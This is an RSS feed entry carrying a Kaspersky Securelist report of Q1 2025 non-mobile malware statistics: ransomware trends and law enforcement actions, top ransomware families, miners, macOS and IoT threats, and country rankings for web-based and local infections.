<category><![CDATA[Miner]]></category>
<category><![CDATA[Trojan-stealer]]></category>
<category><![CDATA[Trojan-Spy]]></category>
<category><![CDATA[SSH]]></category>
<category><![CDATA[Windows malware]]></category>
<category><![CDATA[Unix and macOS malware]]></category>
<guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116686</guid>
<description><![CDATA[The report presents statistics for Windows, macOS, IoT, and other threats, including ransomware, miners, local and web-based threats, for Q1 2025.]]></description>
<content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p><strong>IT threat evolution in Q1 2025. Non-mobile statistics</strong><br />
<a href="https://securelist.com/malware-report-q1-2025-mobile-statistics/116676/" target="_blank">IT threat evolution in Q1 2025. Mobile statistics</a></p>
<p><em>The statistics in this report are based on detection verdicts returned by Kaspersky products unless otherwise stated. The information was provided by Kaspersky users who consented to sharing statistical data.</em></p>
<h2 id="the-quarter-in-numbers">The quarter in numbers</h2>
<p>In Q1 2025:</p>
<ul>
<li>Kaspersky products blocked more than 629 million attacks that originated with various online resources.</li>
<li>Web Anti-Virus detected 88 million unique links.</li>
<li>File Anti-Virus blocked more than 21 million malicious and potentially unwanted objects.</li>
<li>Nearly 12,000 new ransomware variants were detected.</li>
<li>More than 85,000 users experienced ransomware attacks.</li>
<li>RansomHub was involved in attacks on 11% of all ransomware victims whose data was published on data leak sites (DLSs). Slightly under 11% encountered the Akira and Clop ransomware.</li>
<li>Almost 315,000 users faced miners.</li>
</ul>
<h2 id="ransomware">Ransomware</h2>
<h3 id="the-quarters-trends-and-highlights">The quarter’s trends and highlights</h3>
<h4 id="law-enforcement-success">Law enforcement success</h4>
<p>Phobos Aetor, a joint international effort by law enforcement agencies from the United States, Great Britain, Germany, France and several other countries, resulted in the <a href="https://www.europol.europa.eu/media-press/newsroom/news/key-figures-behind-phobos-and-8base-ransomware-arrested-in-international-cybercrime-crackdown" target="_blank" rel="noopener">arrest of four suspected members</a> of 8Base. They are accused of carrying out more than 1,000 cyberattacks around the world with the help of the <a href="https://securelist.com/cis-ransomware/104452/#phobos-eking" target="_blank" rel="noopener">Phobos ransomware</a>. The suspects were arrested in Thailand and charged with extorting more than $16 million in Bitcoin. According to law enforcement officials, the multinational operation resulted in the seizure of more than 40 assets, including computers, phones, and cryptocurrency wallets. Additionally, law enforcement took down 27 servers linked to the cybercrime gang.</p>
<p>An ongoing effort to combat <a href="https://securelist.com/tag/lockbit/" target="_blank" rel="noopener">LockBit</a> led to the <a href="https://www.justice.gov/usao-nj/pr/dual-russian-and-israeli-national-extradited-united-states-his-role-lockbit-ransomware" target="_blank" rel="noopener">extradition</a> of a suspected ransomware developer to the United States. Arrested in Israel last August, the suspect is accused of receiving more than $230,000 in cryptocurrency for his work with the group between June 2022 and February 2024.</p>
<h4 id="vulnerabilities-and-attacks-byovd-and-edr-bypassing">Vulnerabilities and attacks, BYOVD, and EDR bypassing</h4>
<p>The first quarter saw a series of vulnerabilities <a href="https://kb.cert.org/vuls/id/726882" target="_blank" rel="noopener">detected</a> in Paragon Partition Manager. They were assigned the identifiers CVE-2025-0288, CVE-2025-0287, CVE-2025-0286, CVE-2025-0285, and CVE-2025-0289. According to researchers, ransomware gangs had been exploiting the vulnerabilities to gain Windows SYSTEM privileges during BYOVD (bring your own vulnerable driver) attacks.</p>
<p>Akira <a href="https://www.bleepingcomputer.com/news/security/ransomware-gang-encrypted-network-from-a-webcam-to-bypass-edr/" target="_blank" rel="noopener">exploited</a> a vulnerability in a webcam in an attempt to bypass endpoint detection and response (EDR) and encrypt files on the organization’s network over the SMB protocol. The attackers found that their Windows ransomware was being detected and blocked by the security solution. To bypass it, they found a vulnerable network webcam in the targeted organization that was running a Linux-based operating system and was not protected by EDR. The attackers were able to evade detection by compromising the webcam, mounting network drives of other machines, and running the Linux version of their ransomware on the camera.</p>
<p>HellCat leveraged compromised Jira credentials to <a href="https://www.bleepingcomputer.com/news/security/hellcat-hackers-go-on-a-worldwide-jira-hacking-spree/" target="_blank" rel="noopener">attack</a> a series of companies, including Ascom, Jaguar Land Rover, and Affinitiv. According to <a href="https://www.infostealers.com/article/jaguar-land-rover-breached-by-hellcat-ransomware-using-its-infostealer-playbook-then-a-second-hacker-strikes/" target="_blank" rel="noopener">researchers</a>, the threat actors obtain credentials by infecting employees’ computers with Trojan stealers like <a href="https://securelist.com/lumma-fake-captcha-attacks-analysis/116274/" target="_blank" rel="noopener">Lumma</a>.</p>
<h4 id="other-developments">Other developments</h4>
<p>An unidentified source <a href="https://www.bleepingcomputer.com/news/security/black-basta-ransomware-gang-s-internal-chat-logs-leak-online/" target="_blank" rel="noopener">posted</a> Matrix chat logs belonging to the Black Basta gang. The logs feature information about the gang’s attack techniques and vulnerabilities that it exploited. In addition, the logs contain details about the group’s internal structure and its members, as well as more than 367 unique ZoomInfo links that the attackers used to gather data on potential victims.</p>
<p>BlackLock was compromised due to a vulnerability in the threat actor’s data leak site (DLS). Researchers who <a href="https://www.resecurity.com/blog/article/blacklock-ransomware-a-late-holiday-gift-with-intrusion-into-the-threat-actors-infrastructure" target="_blank" rel="noopener">discovered</a> the vulnerability gained access to confidential information about the group and its activities, including configuration files, login credentials, and the history of commands run on the server. DragonForce, a rival ransomware outfit, exploited the same security flaw to deface the DLS. They changed the site’s appearance, and made BlackLock’s internal chat logs and certain configuration files publicly available.</p>
<h4 id="the-most-prolific-groups">The most prolific groups</h4>
<p>This section highlights the most prolific ransomware groups by number of victims that each added to their DLS during the reporting period. RansomHub, which stood out in 2024, remained the leader by number of new victims with 11.03%. Akira (10.89%) and Clop (10.69%) followed close behind.</p>
<div class="js-infogram-embed" data-id="_/TtLYZQF0PuYYU2z1akdJ" data-type="interactive" data-title="01-EN-Malware report PC graphs" style="min-height:;"></div>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The number of the group’s victims according to its DLS as a percentage of all groups’ victims published on all the DLSs reviewed during the reporting period (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/03223543/malware-report-q1-2025-pcEN1.png" target="_blank" rel="noopener">download</a>)</em></p>
<h3 id="number-of-new-modifications">Number of new modifications</h3>
<p>In the first quarter, Kaspersky solutions detected three new ransomware families and 11,733 new variants – almost four times more than in the fourth quarter of 2024. This is due to the large number of samples that our solutions categorized as belonging to the Trojan-Ransom.Win32.Gen family.</p>
<div class="js-infogram-embed" data-id="_/n6PamiPNmo56H13c1A7N" data-type="interactive" data-title="02 EN-RU-ES-Malware report PC graphs" style="min-height:;"></div>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>New ransomware variants, Q1 2024 – Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05083923/malware-report-q1-2025-pc2.png" target="_blank" rel="noopener">download</a>)</em></p>
<h3 id="number-of-users-attacked-by-ransomware-trojans">Number of users attacked by ransomware Trojans</h3>
<p>In the first quarter of 2025, Kaspersky solutions protected 85,474 unique KSN users from ransomware Trojans.</p>
<div class="js-infogram-embed" data-id="_/LfyR0oMuDb1LD4Id0hFJ" data-type="interactive" data-title="03-EN-Malware report PC graphs" style="min-height:;"></div>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of unique users attacked by ransomware Trojans, Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/03223900/malware-report-q1-2025-pcEN3.png" target="_blank" rel="noopener">download</a>)</em></p>
<h3 id="attack-geography">Attack geography</h3>
<h4 id="top-10-countries-and-territories-attacked-by-ransomware-trojans">Top 10 countries and territories attacked by ransomware Trojans</h4>
<table>
<tbody>
<tr>
<td></td>
<td><strong>Country/territory*</strong></td>
<td><strong>%**</strong></td>
</tr>
<tr>
<td>1</td>
<td>Oman</td>
<td>0.661</td>
</tr>
<tr>
<td>2</td>
<td>Libya</td>
<td>0.643</td>
</tr>
<tr>
<td>3</td>
<td>South Korea</td>
<td>0.631</td>
</tr>
<tr>
<td>4</td>
<td>China</td>
<td>0.626</td>
</tr>
<tr>
<td>5</td>
<td>Bangladesh</td>
<td>0.472</td>
</tr>
<tr>
<td>6</td>
<td>Iraq</td>
<td>0.452</td>
</tr>
<tr>
<td>7</td>
<td>Rwanda</td>
<td>0.443</td>
</tr>
<tr>
<td>8</td>
<td>Pakistan</td>
<td>0.441</td>
</tr>
<tr>
<td>9</td>
<td>Tajikistan</td>
<td>0.439</td>
</tr>
<tr>
<td>10</td>
<td>Sri Lanka</td>
<td>0.419</td>
</tr>
</tbody>
</table>
<p><em>* Excluded are countries and territories with relatively few (under 50,000) Kaspersky product users.</em><br />
<em>** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique Kaspersky product users in the country/territory.</em></p>
<h4 id="top-10-most-common-ransomware-trojan-families">TOP 10 most common ransomware Trojan families</h4>
<table>
<tbody>
<tr>
<td></td>
<td><strong>Name</strong></td>
<td><strong>Verdict</strong></td>
<td><strong>%*</strong></td>
</tr>
<tr>
<td>1</td>
<td>(generic verdict)</td>
<td>Trojan-Ransom.Win32.Gen</td>
<td>25.10</td>
</tr>
<tr>
<td>2</td>
<td>WannaCry</td>
<td>Trojan-Ransom.Win32.Wanna</td>
<td>8.19</td>
</tr>
<tr>
<td>3</td>
<td>(generic verdict)</td>
<td>Trojan-Ransom.Win32.Encoder</td>
<td>6.70</td>
</tr>
<tr>
<td>4</td>
<td>(generic verdict)</td>
<td>Trojan-Ransom.Win32.Crypren</td>
<td>6.65</td>
</tr>
<tr>
<td>5</td>
<td>(generic verdict)</td>
<td>Trojan-Ransom.Win32.Agent</td>
<td>3.95</td>
</tr>
<tr>
<td>6</td>
<td>Cryakl/CryLock</td>
<td>Trojan-Ransom.Win32.Cryakl</td>
<td>3.16</td>
</tr>
<tr>
<td>7</td>
<td>LockBit</td>
<td>Trojan-Ransom.Win32.Lockbit</td>
<td>3.15</td>
</tr>
<tr>
<td>8</td>
<td>(generic verdict)</td>
<td>Trojan-Ransom.Win32.Phny</td>
<td>2.90</td>
</tr>
<tr>
<td>9</td>
<td>PolyRansom/VirLock</td>
<td>Virus.Win32.PolyRansom / Trojan-Ransom.Win32.PolyRansom</td>
<td>2.73</td>
</tr>
<tr>
<td>10</td>
<td>(generic verdict)</td>
<td>Trojan-Ransom.Win32.Crypmod</td>
<td>2.66</td>
</tr>
</tbody>
</table>
<p><em>* Unique Kaspersky product users attacked by the specific ransomware Trojan family as a percentage of all unique users attacked by this type of threat.</em></p>
<h2 id="miners">Miners</h2>
<h3 id="number-of-new-modifications">Number of new modifications</h3>
<p>In the first quarter of 2025, Kaspersky solutions detected <strong>5,467</strong> new miner variants.</p>
<div class="js-infogram-embed" data-id="_/qfmv3gRYOS6VGlloi0d8" data-type="interactive" data-title="04-EN-Malware report PC graphs" style="min-height:;"></div>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>New miner variants, Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/03224711/malware-report-q1-2025-pcEN4.png" target="_blank" rel="noopener">download</a>)</em></p>
<h3 id="number-of-users-attacked-by-miners">Number of users attacked by miners</h3>
<p>Miners were fairly active in the first quarter. During the reporting period, we detected miner attacks on the computers of <strong>315,701</strong> unique Kaspersky product users worldwide.</p>
<div class="js-infogram-embed" data-id="_/cWKfuf8GbwWtN4GHoTcq" data-type="interactive" data-title="05-EN-Malware report PC graphs" style="min-height:;"></div>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of unique users attacked by miners, Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/03224953/malware-report-q1-2025-pcEN5.png" target="_blank" rel="noopener">download</a>)</em></p>
<h3 id="attack-geography">Attack geography</h3>
<h4 id="top-10-countries-and-territories-attacked-by-miners">Top 10 countries and territories attacked by miners</h4>
<table>
<tbody>
<tr>
<td></td>
<td><strong>Country/territory*</strong></td>
<td><strong>%**</strong></td>
</tr>
<tr>
<td>1</td>
<td>Senegal</td>
<td>2.59</td>
</tr>
<tr>
<td>2</td>
<td>Kazakhstan</td>
<td>1.36</td>
</tr>
<tr>
<td>3</td>
<td>Panama</td>
<td>1.28</td>
</tr>
<tr>
<td>4</td>
<td>Belarus</td>
<td>1.22</td>
</tr>
<tr>
<td>5</td>
<td>Ethiopia</td>
<td>1.09</td>
</tr>
<tr>
<td>6</td>
<td>Tajikistan</td>
<td>1.07</td>
</tr>
<tr>
<td>7</td>
<td>Moldova</td>
<td>0.90</td>
</tr>
<tr>
<td>8</td>
<td>Dominican Republic</td>
<td>0.86</td>
</tr>
<tr>
<td>9</td>
<td>Kyrgyzstan</td>
<td>0.84</td>
</tr>
<tr>
<td>10</td>
<td>Tanzania</td>
<td>0.82</td>
</tr>
</tbody>
</table>
<p><em>* Excluded are countries and territories with relatively few (under 50,000) Kaspersky product users.</em><br />
<em>** Unique users whose computers were attacked by miners as a percentage of all unique Kaspersky product users in the country/territory.</em></p>
<h2 id="attacks-on-macos">Attacks on macOS</h2>
<p>The first quarter saw the <a href="https://www.sentinelone.com/blog/readerupdate-reforged-melting-pot-of-macos-malware-adds-go-to-crystal-nim-and-rust-variants/" target="_blank" rel="noopener">discovery</a> of a new Trojan loader for macOS. This is a Go-based variant of ReaderUpdate, which has previously appeared in Python, Crystal, Rust, and Nim versions. These loaders are typically used to download intrusive adware, but there is nothing stopping them from delivering any kind of Trojan.</p>
<p>During the reporting period <a href="https://www.sentinelone.com/blog/macos-flexibleferret-further-variants-of-dprk-malware-family-unearthed/" target="_blank" rel="noopener">researchers identified</a> new loaders from the Ferret malware family which were being distributed by attackers through fake online job interview invitations. These Trojans are believed to be part of an ongoing campaign that began in December 2022. The original members of the Ferret family date back to late 2024. Past versions of the loader delivered both a backdoor and a crypto stealer.</p>
<p>Throughout the first quarter, various modifications of the <a href="https://securelist.com/crimeware-report-fakesg-akira-amos/111483/#amos" target="_blank" rel="noopener">Amos stealer</a> were the most aggressively distributed Trojans. Amos is designed to steal user passwords, cryptocurrency wallet data, browser cookies, and documents. In this campaign, threat actors frequently modify their Trojan obfuscation techniques to evade detection, generating thousands of obfuscated files to overwhelm security solutions.</p>
<h4 id="top-20-threats-to-macos">TOP 20 threats to macOS</h4>
<div class="js-infogram-embed" data-id="_/SAQOyIOEu62NVVMnZAX6" data-type="interactive" data-title="06-ES-EN-Malware report PC graphs" style="min-height:;"></div>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>TOP 20 threats to macOS (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05084335/malware-report-q1-2025-pc6-scaled-1-scaled.png" target="_blank" rel="noopener">download</a>)</em></p>
<p><em>* Unique users who encountered this malware as a percentage of all attacked users of Kaspersky security solutions for macOS.</em><br />
<em>** Data for the previous quarter may differ slightly from previously published data due to certain verdicts being retrospectively revised.</em></p>
<p>As usual, a significant share of the most common threats to macOS consists of potentially unwanted applications: adware, spyware tracking user activity, fake cleaners, and reverse proxies like NetTool. Amos Trojans, which we mentioned earlier, also gained popularity in the first quarter. Trojan.OSX.Agent.gen, which holds the third spot in the rankings, is a generic verdict that detects a wide variety of malware.</p>
<h3 id="geography-of-threats-to-macos">Geography of threats to macOS</h3>
<h4 id="top-10-countries-and-territories-by-share-of-attacked-users">TOP 10 countries and territories by share of attacked users</h4>
<table>
<tbody>
<tr>
<td><strong>Country/territory</strong></td>
<td><strong>Q4 2024*</strong></td>
<td><strong>Q1 2025*</strong></td>
</tr>
<tr>
<td>Spain</td>
<td>1.16%</td>
<td>1.02%</td>
</tr>
<tr>
<td>France</td>
<td>1.52%</td>
<td>0.96%</td>
</tr>
<tr>
<td>Hong Kong</td>
<td>1.21%</td>
<td>0.83%</td>
</tr>
<tr>
<td>Singapore</td>
<td>0.32%</td>
<td>0.75%</td>
</tr>
<tr>
<td>Mexico</td>
<td>0.85%</td>
<td>0.74%</td>
</tr>
<tr>
<td>Germany</td>
<td>0.96%</td>
<td>0.74%</td>
</tr>
<tr>
<td>Mainland China</td>
<td>0.73%</td>
<td>0.68%</td>
</tr>
<tr>
<td>Brazil</td>
<td>0.66%</td>
<td>0.61%</td>
</tr>
<tr>
<td>Russian Federation</td>
<td>0.50%</td>
<td>0.53%</td>
</tr>
<tr>
<td>India</td>
<td>0.84%</td>
<td>0.51%</td>
</tr>
</tbody>
</table>
<p><em>* Unique users who encountered threats to macOS as a percentage of all unique Kaspersky product users in the country/territory.</em></p>
<h2 id="iot-threat-statistics">IoT threat statistics</h2>
<p><em>This section presents statistics on attacks targeting Kaspersky IoT honeypots. The geographic data on attack sources is based on the IP addresses of attacking devices.</em></p>
<p>In the first quarter of 2025, the share of devices that attacked Kaspersky honeypots via the Telnet protocol increased again, following a decline at the end of 2024.</p>
<div class="js-infogram-embed" data-id="_/VC8mYjhxGiEx8SyBciGb" data-type="interactive" data-title="07-EN-ES-Malware report PC graphs" style="min-height:;"></div>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of attacked services by number of unique IP addresses of attacking devices (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05085117/malware-report-q1-2025-pc7.png" target="_blank" rel="noopener">download</a>)</em></p>
<p>The distribution of attacks across Telnet and SSH remained virtually unchanged compared to the fourth quarter of 2024.</p>
<div class="js-infogram-embed" data-id="_/hidtuVe32dVjJRwW3Zwr" data-type="interactive" data-title="08-EN-ES-Malware report PC graphs" style="min-height:;"></div>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of attackers’ sessions in Kaspersky honeypots (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05085229/malware-report-q1-2025-pc8.png" target="_blank" rel="noopener">download</a>)</em></p>
<h3 id="top-10-threats-delivered-to-iot-devices">TOP 10 threats delivered to IoT devices</h3>
<div class="js-infogram-embed" data-id="_/LBg19h9hPlaPnfxw2msy" data-type="interactive" data-title="09-ES-EN-Malware report PC graphs" style="min-height:;"></div>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Share of each threat uploaded to an infected device as a result of a successful attack in the total number of uploaded threats (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05084049/malware-report-q1-2025-pc9.png" target="_blank" rel="noopener">download</a>)</em></p>
<p>A significant portion of the most widespread IoT threats continues to be made up of various Mirai DDoS botnet variants. BitCoinMiner also saw active distribution in the first quarter, accounting for 7.32% of detections. The number of attacks by the NyaDrop botnet (19.31%) decreased compared to the fourth quarter of 2024.</p>
<h3 id="geography-of-attacks-on-iot-honeypots">Geography of attacks on IoT honeypots</h3>
<p>When looking at SSH attacks by country/territory, mainland China’s share has declined, while attacks coming from Brazil have seen a noticeable increase. There was also a slight uptick in attacks coming from the United States, Indonesia, Australia, and Vietnam.</p>
<table>
<tbody>
<tr>
<td><strong>Country/territory</strong></td>
<td><strong>Q4 2024</strong></td>
<td><strong>Q1 2025</strong></td>
</tr>
<tr>
<td>Mainland China</td>
<td>32.99%</td>
<td>20.52%</td>
</tr>
<tr>
<td>India</td>
<td>19.13%</td>
<td>19.16%</td>
</tr>
<tr>
<td>Russian Federation</td>
<td>9.46%</td>
<td>9.16%</td>
</tr>
<tr>
<td>Brazil</td>
<td>2.18%</td>
<td>8.48%</td>
</tr>
<tr>
<td>United States</td>
<td>4.90%</td>
<td>5.52%</td>
</tr>
<tr>
<td>Indonesia</td>
<td>1.37%</td>
<td>3.99%</td>
</tr>
<tr>
<td>Hong Kong</td>
<td>2.81%</td>
<td>3.46%</td>
</tr>
<tr>
<td>Australia</td>
<td>1.31%</td>
<td>2.75%</td>
</tr>
<tr>
<td>France</td>
<td>3.53%</td>
<td>2.54%</td>
</tr>
<tr>
<td>Vietnam</td>
<td>1.41%</td>
<td>2.27%</td>
</tr>
</tbody>
</table>
<p>The share of Telnet attacks originating from China and India dropped, while Brazil, Nigeria, and Indonesia took a noticeably larger share.</p>
<table>
<tbody>
<tr>
<td><strong>Country/territory</strong></td>
<td><strong>Q4 2024</strong></td>
<td><strong>Q1 2025</strong></td>
</tr>
<tr>
<td>China</td>
<td>44.67%</td>
<td>39.82%</td>
</tr>
<tr>
<td>India</td>
<td>33.79%</td>
<td>30.07%</td>
</tr>
<tr>
<td>Brazil</td>
<td>2.62%</td>
<td>12.03%</td>
</tr>
<tr>
<td>Russian Federation</td>
<td>6.52%</td>
<td>5.14%</td>
</tr>
<tr>
<td>Pakistan</td>
<td>5.77%</td>
<td>3.99%</td>
</tr>
<tr>
<td>Nigeria</td>
<td>0.50%</td>
<td>3.01%</td>
</tr>
<tr>
<td>Indonesia</td>
<td>0.58%</td>
<td>2.25%</td>
</tr>
<tr>
<td>United States</td>
<td>0.42%</td>
<td>0.68%</td>
</tr>
<tr>
<td>Ukraine</td>
<td>0.79%</td>
<td>0.67%</td>
</tr>
<tr>
<td>Sweden</td>
<td>0.42%</td>
<td>0.33%</td>
</tr>
</tbody>
</table>
<h2 id="attacks-via-web-resources">Attacks via web resources</h2>
<p><em>The statistics in this section are based on detection verdicts by Web Anti-Virus, which protects users when suspicious objects are downloaded from malicious or infected web pages. Cybercriminals create malicious pages on purpose. Websites that host user-created content, such as forums, as well as compromised legitimate sites, can become infected.</em></p>
<h3 id="countries-and-territories-that-serve-as-sources-of-web-based-attacks-the-top-10">Countries and territories that serve as sources of web-based attacks: the TOP 10</h3>
<p>This section contains a geographical distribution of sources of online attacks blocked by Kaspersky products: web pages that redirect to exploits, sites that host exploits and other malware, botnet C&C centers, and so on. Any unique host could be the source of one or more web-based attacks.<br />
To determine the geographical source of web-based attacks, domain names were matched against their actual IP addresses, and then the geographical location of a specific IP address (GeoIP) was established.</p>
<p>In the first quarter of 2025, Kaspersky solutions blocked <strong>629,211,451 </strong>attacks launched from online resources across the globe. Web Anti-Virus detected <strong>88,389,361</strong> unique URLs.</p>
<div class="js-infogram-embed" data-id="_/rMhwfbqmTtIocmXyWCIY" data-type="interactive" data-title="10-EN-Malware report PC graphs" style="min-height:;"></div>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Geographical distribution of sources of web-based attacks by country/territory, Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/03230309/malware-report-q1-2025-pcEN10.png" target="_blank" rel="noopener">download</a>)</em></p>
<h3 id="countries-and-territories-where-users-faced-the-greatest-risk-of-online-infection">Countries and territories where users faced the greatest risk of online infection</h3>
<p>To assess the risk of online infection faced by PC users in various countries and territories, we calculated, for each country or territory, the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the reporting period. The resulting data reflects how aggressive the environment is in which computers operate in different countries and territories.</p>
<p>These rankings only include attacks by malicious objects that belong in the <strong>Malware</strong> category. Our calculations do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.</p>
<table>
<tbody>
<tr>
<td></td>
<td><strong>Country/territory*</strong></td>
<td><strong>%**</strong></td>
</tr>
<tr>
<td>1</td>
<td>North Macedonia</td>
<td>10.17</td>
</tr>
<tr>
<td>2</td>
<td>Albania</td>
<td>9.96</td>
</tr>
<tr>
<td>3</td>
<td>Algeria</td>
<td>9.92</td>
</tr>
<tr>
<td>4</td>
<td>Bangladesh</td>
<td>9.92</td>
</tr>
<tr>
<td>5</td>
<td>Tunisia</td>
<td>9.80</td>
</tr>
<tr>
<td>6</td>
<td>Slovakia</td>
<td>9.77</td>
</tr>
<tr>
<td>7</td>
<td>Greece</td>
<td>9.66</td>
</tr>
<tr>
<td>8</td>
<td>Serbia</td>
<td>9.44</td>
</tr>
<tr>
<td>9</td>
<td>Tajikistan</td>
<td>9.28</td>
</tr>
<tr>
<td>10</td>
<td>Turkey</td>
<td>9.10</td>
</tr>
<tr>
<td>11</td>
<td>Peru</td>
<td>8.78</td>
</tr>
<tr>
<td>12</td>
<td>Portugal</td>
<td>8.70</td>
</tr>
<tr>
<td>13</td>
<td>Nepal</td>
<td>8.38</td>
</tr>
<tr>
<td>14</td>
<td>Philippines</td>
<td>8.33</td>
</tr>
<tr>
<td>15</td>
<td>Romania</td>
<td>8.26</td>
</tr>
<tr>
<td>16</td>
<td>Sri Lanka</td>
<td>8.20</td>
</tr>
<tr>
<td>17</td>
<td>Bulgaria</td>
<td>8.19</td>
</tr>
<tr>
<td>18</td>
<td>Madagascar</td>
<td>8.14</td>
</tr>
<tr>
<td>19</td>
<td>Hungary</td>
<td>8.12</td>
</tr>
<tr>
<td>20</td>
<td>Egypt</td>
<td>8.12</td>
</tr>
</tbody>
</table>
<p><em>* Excluded are countries and territories with relatively few (under 10,000) Kaspersky product users.</em><br />
<em>** Unique users targeted by web-based <strong>Malware</strong> attacks as a percentage of all unique Kaspersky product users in the country/territory.</em></p>
<p>On average during the quarter, 6.46% of users’ computers worldwide were subjected to at least one web-based <strong>Malware</strong> attack.</p>
<h2 id="local-threats">Local threats</h2>
<p>Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer by infecting files or removable media, or that initially arrived on the computer in a form that hid their nature, such as programs bundled inside complex installers or stored in encrypted files.</p>
<p>Data in this section is based on analyzing statistics produced by anti-virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The statistics are based on detection verdicts from the OAS (on-access scan) and ODS (on-demand scan) modules of File Anti-Virus. The data includes detections of malicious programs located on user computers or removable media connected to the computers, such as flash drives, camera memory cards, phones, or external hard drives.</p>
<p>In the first quarter of 2025, our File Anti-Virus detected <strong>21,533,464</strong> malicious and potentially unwanted objects.</p>
<h3 id="countries-and-territories-where-users-faced-the-highest-risk-of-local-infection">Countries and territories where users faced the highest risk of local infection</h3>
<p>For each country and territory, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in various countries and territories across the globe.</p>
<p>The rankings only include attacks by malicious objects that belong in the <strong>Malware</strong> category. Our calculations do not include File Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.</p>
<table>
<tbody>
<tr>
<td></td>
<td><strong>Country/territory*</strong></td>
<td><strong>%**</strong></td>
</tr>
<tr>
<td>1</td>
<td>Turkmenistan</td>
<td>47.41</td>
</tr>
<tr>
<td>2</td>
<td>Tajikistan</td>
<td>37.23</td>
</tr>
<tr>
<td>3</td>
<td>Afghanistan</td>
<td>36.92</td>
</tr>
<tr>
<td>4</td>
<td>Yemen</td>
<td>35.80</td>
</tr>
<tr>
<td>5</td>
<td>Cuba</td>
<td>32.08</td>
</tr>
<tr>
<td>6</td>
<td>Uzbekistan</td>
<td>31.31</td>
</tr>
<tr>
<td>7</td>
<td>Gabon</td>
<td>27.55</td>
</tr>
<tr>
<td>8</td>
<td>Syria</td>
<td>26.50</td>
</tr>
<tr>
<td>9</td>
<td>Vietnam</td>
<td>25.88</td>
</tr>
<tr>
<td>10</td>
<td>Belarus</td>
<td>25.68</td>
</tr>
<tr>
<td>11</td>
<td>Algeria</td>
<td>25.02</td>
</tr>
<tr>
<td>12</td>
<td>Bangladesh</td>
<td>24.86</td>
</tr>
<tr>
<td>13</td>
<td>Iraq</td>
<td>24.77</td>
</tr>
<tr>
<td>14</td>
<td>Cameroon</td>
<td>24.28</td>
</tr>
<tr>
<td>15</td>
<td>Burundi</td>
<td>24.28</td>
</tr>
<tr>
<td>16</td>
<td>Tanzania</td>
<td>24.23</td>
</tr>
<tr>
<td>17</td>
<td>Niger</td>
<td>24.01</td>
</tr>
<tr>
<td>18</td>
<td>Madagascar</td>
<td>23.74</td>
</tr>
<tr>
<td>19</td>
<td>Kyrgyzstan</td>
<td>23.73</td>
</tr>
<tr>
<td>20</td>
<td>Nicaragua</td>
<td>23.72</td>
</tr>
</tbody>
</table>
<p><em>* Excluded are countries and territories with relatively few (under 10,000) Kaspersky product users.</em><br />
<em>** Unique users on whose computers local <strong>Malware</strong> threats were blocked, as a percentage of all unique users of Kaspersky products in the country/territory.</em></p>
<p>On average worldwide, local <strong>Malware</strong> threats were recorded on 13.62% of users’ computers at least once during the quarter.</p>
]]></content:encoded>
<wfw:commentRss>https://securelist.com/malware-report-q1-2025-pc-iot-statistics/116686/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
</item>
<item>
<title>IT threat evolution in Q1 2025. Mobile statistics</title>
<link>https://securelist.com/malware-report-q1-2025-mobile-statistics/116676/</link>
<comments>https://securelist.com/malware-report-q1-2025-mobile-statistics/116676/#respond</comments>
<dc:creator><![CDATA[Anton Kivva]]></dc:creator>
